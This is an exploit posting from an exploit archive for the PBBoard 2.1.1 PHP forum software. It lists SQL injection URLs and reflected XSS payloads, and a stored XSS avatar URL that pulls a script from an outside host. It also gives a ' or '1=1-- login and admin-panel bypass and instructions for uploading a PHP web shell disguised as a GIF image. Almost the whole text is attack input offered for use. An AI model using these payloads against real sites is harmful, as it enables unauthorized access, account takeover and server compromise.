PBBoard 2.1.1 Multiple Remote Vulnerabilities

ID 1337DAY-ID-14224
Type zdt
Reporter JiKo
Modified 2010-09-28T00:00:00


Exploit for php platform in category web applications

PBBoard 2.1.1 Multiple Remote Vulnerabilities

  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
Home    :No-exploit.Com
Mail    : !x!
    name :PBBoard_v2.1.1
    link :http://www.pbboard.com/PBBoard_v2.1.1.zip
    upload Shell and file .exe ....etc :(
    select From my Pc
    and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img
    sql & xss
    all script is infected :(
    inser '( in all % variable in the script
    SQl :/index.php?page=forum&show=1&id=2'a
    Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
    SQl :/index.php?page=profile&show=1&username=jawad'
    SQl :/index.php?page=profile&show=1&username=jawad' and id='1
    Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>
    Xss In Profil
    Url :/index.php?page=usercp&control=1&avatar=1&main=1
    Select img From Url
    http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
    Login :(
    User : real name of admin or member you want | jawad' or '1=1--
    Pass : jiko
    for admin panel
    Url  : /admin.php
    User : jawad' or '1=1--
    Pass : jiko
    :((..Etc exploit
    All my friends
    |No-Exploit.com Members

#  0day.today [2018-03-12]  #